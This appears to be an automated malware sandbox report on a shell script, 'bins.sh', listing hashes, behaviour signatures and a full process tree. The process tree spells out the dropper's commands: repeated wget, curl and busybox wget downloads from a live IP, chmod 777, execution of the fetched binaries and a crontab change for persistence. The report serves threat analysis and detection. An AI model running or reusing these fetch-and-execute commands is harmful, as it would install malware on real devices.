Analysis
-
max time kernel
15s -
max time network
41s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27-10-2024 03:07
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
f1355bcf61566b8e884726b7afa77f2d
-
SHA1
ad708c314476785e25d5f6f0ae6f3197e3d9f904
-
SHA256
e329bfb94581ca68903cc299500255516655f8e868f49a0ff27e47e9f55ad6aa
-
SHA512
f0d0c07f3e32c570f67cb4e05b10b8d02429b384779c6d0dcd5963022b236efd248c606fe6e1e43e974fb986804a039df540bbf1a38198dfc4682c296198178e
-
SSDEEP
96:Z00fw0gjGqoiYoTProP3uZjsH4wDyuv/zQddPKQXhwXhUXh+WXhyXhCXhnsGK/zj:8+cIl/zQddPK0UgHqae/zQddrUgHqaVM
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 740 chmod 765 chmod 784 chmod 800 chmod 806 chmod 681 chmod 702 chmod 813 chmod 820 chmod 827 chmod -
Executes dropped EXE 10 IoCs
Processes:
XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZjlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1ekoIDag2IrendezgvRAX8H4MvHggSiH31vqKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5lYco0C5yriUtJuYiJXGWNob4cNWwcChOKTXECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5MjOzMYLHbxyt0kils26CsOKO81vlByx9CubOESnKxfsceE83uK3qyhjMDf2qeykBknq50B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITrioc pid process /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 682 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 704 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 741 ekoIDag2IrendezgvRAX8H4MvHggSiH31v /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 766 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 786 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT 801 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M 807 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub 814 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 821 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 828 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr -
Renames itself 1 IoCs
Processes:
ekoIDag2IrendezgvRAX8H4MvHggSiH31vpid process 742 ekoIDag2IrendezgvRAX8H4MvHggSiH31v -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.mNXacx crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
ekoIDag2IrendezgvRAX8H4MvHggSiH31vcurlcurlcurlcurlcurlcurlcurlcurlcrontabcrontabdescription ioc process File opened for reading /proc/768/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/783/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/797/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/27/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/754/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/756/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/810/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/762/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/805/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/20/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/812/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/803/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/104/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/758/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/14/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/28/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/142/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/2/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/25/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/739/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/138/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/self/auxv curl File opened for reading /proc/788/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/156/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/751/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/776/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/595/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/656/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/792/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/self/auxv curl File opened for reading /proc/649/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/775/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/773/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/22/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/307/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/11/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/17/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/271/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/self/auxv curl File opened for reading /proc/790/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/filesystems crontab File opened for reading /proc/8/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/720/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/self/auxv curl File opened for reading /proc/13/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/135/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/588/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/10/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/764/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/filesystems crontab File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/305/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/769/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/6/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v File opened for reading /proc/818/cmdline ekoIDag2IrendezgvRAX8H4MvHggSiH31v -
Writes file to tmp directory 16 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxbusyboxbusyboxcurlbusyboxwgetbusyboxwgetbusyboxbusyboxbusyboxbusyboxcurlbusyboxdescription ioc process File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 wget File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl File opened for modification /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT busybox File opened for modification /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M busybox File opened for modification /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub busybox File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ busybox File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v wget File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v busybox File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ wget File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 busybox File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 busybox File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr busybox File opened for modification /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 busybox File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl File opened for modification /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:650
-
/bin/rm/bin/rm bins.sh2⤵PID:652
-
/usr/bin/wgetwget http://87.120.84.230/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Writes file to tmp directory
PID:654 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:674 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Writes file to tmp directory
PID:680 -
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:681 -
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:682 -
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:684
-
/usr/bin/wgetwget http://87.120.84.230/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Writes file to tmp directory
PID:685 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:688 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Writes file to tmp directory
PID:698 -
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:702 -
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:704 -
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:706
-
/usr/bin/wgetwget http://87.120.84.230/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Writes file to tmp directory
PID:708 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:718 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Writes file to tmp directory
PID:734 -
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:740 -
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:741 -
/bin/shsh -c "crontab -l"3⤵PID:743
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:744 -
/bin/shsh -c "crontab -"3⤵PID:746
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:747 -
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:750
-
/usr/bin/wgetwget http://87.120.84.230/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:754
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Checks CPU configuration
PID:755 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Writes file to tmp directory
PID:756 -
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:765 -
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:766 -
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:768
-
/usr/bin/wgetwget http://87.120.84.230/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:769
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Checks CPU configuration
- Reads runtime system information
PID:773 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Writes file to tmp directory
PID:776 -
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:784 -
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:786 -
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:787
-
/usr/bin/wgetwget http://87.120.84.230/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:789
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Checks CPU configuration
- Reads runtime system information
PID:790 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Writes file to tmp directory
PID:793 -
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:800 -
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:801 -
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:802
-
/usr/bin/wgetwget http://87.120.84.230/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:803
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Checks CPU configuration
- Reads runtime system information
PID:804 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Writes file to tmp directory
PID:805 -
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:806 -
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:807 -
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:809
-
/usr/bin/wgetwget http://87.120.84.230/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:810
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Checks CPU configuration
- Reads runtime system information
PID:811 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Writes file to tmp directory
PID:812 -
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:813 -
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:814 -
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:816
-
/usr/bin/wgetwget http://87.120.84.230/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:817
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Checks CPU configuration
- Reads runtime system information
PID:818 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Writes file to tmp directory
PID:819 -
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:820 -
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:821 -
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:823
-
/usr/bin/wgetwget http://87.120.84.230/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:824
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Checks CPU configuration
- Reads runtime system information
PID:825 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Writes file to tmp directory
PID:826 -
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:827 -
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:828 -
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:829
-
/usr/bin/wgetwget http://87.120.84.230/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:830
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
158KB
MD5d8e96e2fdd3c610ec19128e18de5abde
SHA110cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592
-
Filesize
100KB
MD53b78bb645b81d600c30713d416f666be
SHA123796112f2cce2afb2217498b5ecf2801ab550f2
SHA256d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA5129532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9
-
Filesize
95KB
MD5c20c610e14b8e59f5f8258a55fe7f27d
SHA1e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2
-
Filesize
93KB
MD527a1a1941f224eff6a4babf2495e3692
SHA186fae66a698f6280353e470ffadfb64441b03e83
SHA256ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179
SHA512cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934
-
Filesize
84KB
MD564ece99ca4ab1c1405f5a3335d64a960
SHA1b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41
-
Filesize
108KB
MD5c97a9c55ddb153e8bfce38f201d2cffb
SHA13970452f27327f98c2e3fdcabf0390067b48bd62
SHA256138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA5121734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e
-
Filesize
101KB
MD58d0f8d45165dc1f3ba334ce75be39621
SHA11d5baece9d5af3885276735c3c20d28e161e00ff
SHA25617441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
-
Filesize
80KB
MD522c527269cbd9b42f4ade79f52757efb
SHA1c2456188a49af93b0d07af2a7cc1346d5be510bd
SHA256100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97
SHA5127b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53
-
Filesize
122KB
MD5aadb8cc4b6eac7fce760c09262693884
SHA1b55178ff3605f4bbfc9286d4c8ac445673232217
SHA256b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843
SHA5125567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c
-
Filesize
101KB
MD5a7e686eb3f74b104a5520f08cfd54eb5
SHA158b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA5122767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df
-
Filesize
210B
MD5dd56b78740f7e5ffa75a2b8fa4ae9599
SHA110c482173e7e30d5d8f377afc44c9602c15e6305
SHA256ca5c424e6e9b8ec343b692fa2bbd94ebcdb362eaa6d1cff58c51b9deeecca593
SHA512b08236f78efa358c55dd5475ededd55199f48158cd100e3f9b81250b0ba3d673744d2a9de3871650d11106f540a2149c3a84cfed181bb456f629de673577220c